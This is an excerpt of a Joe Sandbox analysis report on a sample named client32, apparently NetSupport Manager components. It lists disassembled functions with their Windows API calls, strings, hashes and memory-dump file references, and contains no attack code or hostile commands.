Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
String ID: MiniDump
API String ID: 1494854734-2840755058
Opcode ID: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
Instruction ID: 82be7c26d502f028142b998fa5126df4c28d1bc7d262cc6800bde2f36eb64e35
Opcode Fuzzy Hash: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
Instruction Fuzzy Hash: F311D675E0022667F700DFE9CC81F9AB7689B05B68F214234F624E66C4E761A5418BA5

Function 11017440 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000002F4,000000FF), ref: 11017472
CoInitialize.OLE32(00000000), ref: 1101747B
CoUninitialize.COMBASE(00000001,?,?), ref: 11017500

Strings

ChassisTypes, xrefs: 110174B2
Win32_SystemEnclosure, xrefs: 11017493

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleUninitializeWait
String ID: ChassisTypes$Win32_SystemEnclosure
API String ID: 2994556011-2037925671
Opcode ID: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
Instruction ID: d4ceec51b3d1aeb93fa2206dcf0162908bfa0d380c5fa1549f26343d1b5ce827
Opcode Fuzzy Hash: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
Instruction Fuzzy Hash: 29213575D406655BDB12CBA4CC45BAEBBED9F84358F0000A4EC58DB288EF39D900C761

Function 68598E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 68595000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
Part of subcall function 68595000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68598EAE
FreeLibrary.KERNEL32(?), ref: 68598EBF

Part of subcall function 68592420: _strrchr.LIBCMT ref: 6859242E

Strings

NSM247Ctl.dll, xrefs: 68598E7E
pcictl_247.dll, xrefs: 68598E6C
Set Is247=%d, xrefs: 68598ED7

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
API String ID: 3215810784-3459472706
Opcode ID: 0c1eb459a09f90f08b246fdc623d0ac87a7dfdcf7a84f62f4c546c9f912fbc31
Instruction ID: 2e7df5cad1e1d205e57a65cd7d462213f867fb545e006c7e25943846b542b7cb
Opcode Fuzzy Hash: 0c1eb459a09f90f08b246fdc623d0ac87a7dfdcf7a84f62f4c546c9f912fbc31
Instruction Fuzzy Hash: 6111C879A801559FEF10DA55DC51BFEB364EB45305FC00455EE2DE3240EB319E44CB66

Function 111433B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,?,?,00000400), ref: 111433DF
wsprintfA.USER32 ref: 11143416

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

..\ctl32\util.cpp, xrefs: 1114342B
i < _tsizeof (buf), xrefs: 11143430
#%d, xrefs: 11143410

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastLoadMessageProcessString
String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
API String ID: 1985783259-2296142801
Opcode ID: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
Instruction ID: c1d41daf5ac04f5e509db8cc8d6ef6429d5cf2497d86e7a71f1ea6c6f60715f8
Opcode Fuzzy Hash: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
Instruction Fuzzy Hash: 2411E5FAE01228A7C711CAA59D80FEEF77C9B45708F544065FB08B3181EA30AA0587A4

Function 110312C0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11031376

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_pDoInv == NULL, xrefs: 110312F3
226546, xrefs: 11031357
%s%s.bin, xrefs: 11031370
clientinv.cpp, xrefs: 110312EE

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess
String ID: %s%s.bin$226546$clientinv.cpp$m_pDoInv == NULL
API String ID: 4180936305-3869819624
Opcode ID: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
Instruction ID: 6dff70f8b624139b5d8b9928b76f3118b4df96bcfaa22522713f30a32685b050
Opcode Fuzzy Hash: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
Instruction Fuzzy Hash: 4D2181B5E00705AFD710DF65DC80BAAB7E4EB88758F10857DF825D7681E734A8008B55

Function 11140CE0 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(111413B8,00000000,?,111413B8,00000000), ref: 11140CFC
__strdup.LIBCMT ref: 11140D17

Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE

Part of subcall function 11140CE0: _free.LIBCMT ref: 11140D3E

_free.LIBCMT ref: 11140D4C

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

CreateDirectoryA.KERNEL32(111413B8,00000000,?,?,?,111413B8,00000000), ref: 11140D57

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
String ID:
API String ID: 398584587-0
Opcode ID: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
Instruction ID: 9875b16ed77e9f13dc3c5425d13c9245bbbda80c09f4107d02f4537b9d4f833e
Opcode Fuzzy Hash: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
Instruction Fuzzy Hash: 9101F53B6042161AF301157E6D01BEFBB9C8BC2B6CF284176E98DC6585F756F41A82A2

Function 1100EC70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ECA2

Part of subcall function 1115CFF4: _setlocale.LIBCMT ref: 1115D006

_free.LIBCMT ref: 1100ECB4

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

_free.LIBCMT ref: 1100ECC7
_free.LIBCMT ref: 1100ECDA
_free.LIBCMT ref: 1100ECED

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
Instruction ID: 6354e4c6b4ea18464702b145c06536eed7bcdebf3ca81661a54f05b51a131181
Opcode Fuzzy Hash: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
Instruction Fuzzy Hash: 1E11E2B1D00A559BE7A0CF99C840A0BFBFDEB41614F144A2AE426D3740E731F9048B92

Function 11141F80 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

wsprintfA.USER32 ref: 11141FAE
wsprintfA.USER32 ref: 11141FC4

Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F

Strings

%sNSA.LIC, xrefs: 11141FBE
%sNSM.LIC, xrefs: 11141FA8
NSM.LIC, xrefs: 11141F93

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
API String ID: 3779116287-2600120591
Opcode ID: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
Instruction ID: b8eec695178ba2d1a937c5ef531141e0e56104a00a3206b9e8423c5fe1c12a7b
Opcode Fuzzy Hash: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
Instruction Fuzzy Hash: 9001D4B9E0122D66DB50DBB09D41FEBF7ACCB44608F1001E5ED0997181EE31BA448B95

Function 1113F8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
CloseHandle.KERNEL32(00000000), ref: 1113F95F

Strings

", xrefs: 1113F8EE

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseHandle
String ID: "
API String ID: 1443461169-123907689
Opcode ID: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
Instruction ID: 9c86450901ac288abfb1a5416e129d0f3cdd4120216def2344b537bfb16cbc1a
Opcode Fuzzy Hash: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
Instruction Fuzzy Hash: F421BE30A0426AAFE312CE38DD54BD9BB949F82324F2041E4F9D5DB1C8EA719A488752

Function 68596610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84networkCOMMON

Download Yara Rule

APIs

Part of subcall function 685A9BF0: _strncpy.LIBCMT ref: 685A9C14

inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 68596691
gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 685966A2
WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 685966CD

Strings

Cannot resolve hostname %s, error %d, xrefs: 685966D6

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast_strncpygethostbynameinet_addr
String ID: Cannot resolve hostname %s, error %d
API String ID: 2603238076-1802540647
Opcode ID: ac746b96797c9f2c88474287111a265455a07addd814ddf11fcf3f1dffda775e
Instruction ID: 8ee86666c36afe0e9ec017191a216632d1fe139ab56e6a3bb53b3a1890622fb9
Opcode Fuzzy Hash: ac746b96797c9f2c88474287111a265455a07addd814ddf11fcf3f1dffda775e
Instruction Fuzzy Hash: DB219435A402189BDB10DA64DC50BAAB3F8BF98254F808599E919D7280EF31AD44CBA1

Function 1102CD10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,7E4636A2,?,?,?,Function_00186DCB,000000FF), ref: 1102CDC7

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E

CreateEventA.KERNEL32 ref: 1102CD8A

Strings

Client, xrefs: 1102CD43
DisableGeolocation, xrefs: 1102CD3E

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
